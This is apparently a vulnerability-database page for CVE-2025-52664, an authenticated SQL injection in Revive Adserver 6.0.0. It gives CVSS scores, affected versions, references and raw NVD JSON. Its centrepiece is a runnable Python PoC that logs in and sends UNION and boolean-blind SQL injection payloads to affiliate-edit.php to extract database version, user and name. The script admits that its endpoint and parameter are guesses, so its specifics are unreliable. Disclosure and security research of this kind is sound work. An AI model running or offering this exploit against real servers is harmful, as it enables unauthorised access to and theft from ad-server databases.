CVE-2025-52664

Description

SQL injection in Revive Adserver 6.0.0 causes potential disruption or information access when specifically crafted payloads are sent by logged in users

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:revive-adserver:revive_adserver:6.0.0:-:*:*:*:*:*:* - VULNERABLE

Revive Adserver < 6.0.0 (potentially affected)

Revive Adserver 6.0.0 (confirmed affected)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-52664 SQL Injection PoC for Revive Adserver 6.0.0
# Note: This is a conceptual PoC for educational purposes only

import requests
import sys

def exploit_sql_injection(target_url, session_cookie, username, password):
    """
    Exploit SQL injection in Revive Adserver 6.0.0
    
    Parameters:
    target_url: Base URL of Revive Adserver
    session_cookie: Valid session cookie for authenticated user
    username: Low-privilege username
    password: Password for the account
    """
    # Login to get valid session
    login_url = f"{target_url}/www/admin/login.php"
    login_data = {
        "username": username,
        "password": password
    }
    
    session = requests.Session()
    login_response = session.post(login_url, data=login_data)
    
    if "login" not in login_response.url.lower():
        print("[+] Login successful")
    else:
        print("[-] Login failed")
        return
    
    # SQL Injection payload - extracts database version
    # Target endpoint depends on vulnerable parameter
    vulnerable_endpoint = f"{target_url}/www/admin/affiliate-edit.php"
    
    # Boolean-based blind SQL injection payload
    sql_payload = "1' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)='1"
    
    # UNION-based injection payload example
    union_payload = "1' UNION SELECT NULL,NULL,NULL,NULL,version(),user(),database(),NULL-- -"
    
    # Send malicious request
    headers = {
        "Cookie": f"PHPSESSID={session.cookies.get('PHPSESSID')}"
    }
    
    exploit_data = {
        "clientid": union_payload,  # Vulnerable parameter
        "submit": "Save Changes"
    }
    
    try:
        response = session.post(vulnerable_endpoint, data=exploit_data, headers=headers)
        
        if "5." in response.text or "mysql" in response.text.lower():
            print("[+] SQL Injection successful - Database info extracted")
            print(f"[*] Response length: {len(response.text)} bytes")
        else:
            print("[-] SQL Injection may have failed or no visible output")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 5:
        print(f"Usage: python {sys.argv[0]} <target_url> <cookie> <username> <password>")
        sys.exit(1)
    
    exploit_sql_injection(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-52664
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-52664
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-52664/
[4] VulDB https://vuldb.com/cve/CVE-2025-52664
[5] https://hackerone.com/reports/3395221
[6] http://seclists.org/fulldisclosure/2025/Oct/21

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-52664", "sourceIdentifier": "[email protected]", "published": "2025-10-31T00:15:36.883", "lastModified": "2025-12-01T20:15:51.900", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQL injection in Revive Adserver 6.0.0 causes potential disruption or information access when specifically crafted payloads are sent by logged in users"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:revive-adserver:revive_adserver:6.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "9EF49CB0-886F-4AB3-8CBF-B7A8A7276DD9"}]}]}], "references": [{"url": "https://hackerone.com/reports/3395221", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch", "Third Party Advisory"]}, {"url": "http://seclists.org/fulldisclosure/2025/Oct/21", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Patch", "Third Party Advisory"]}]}}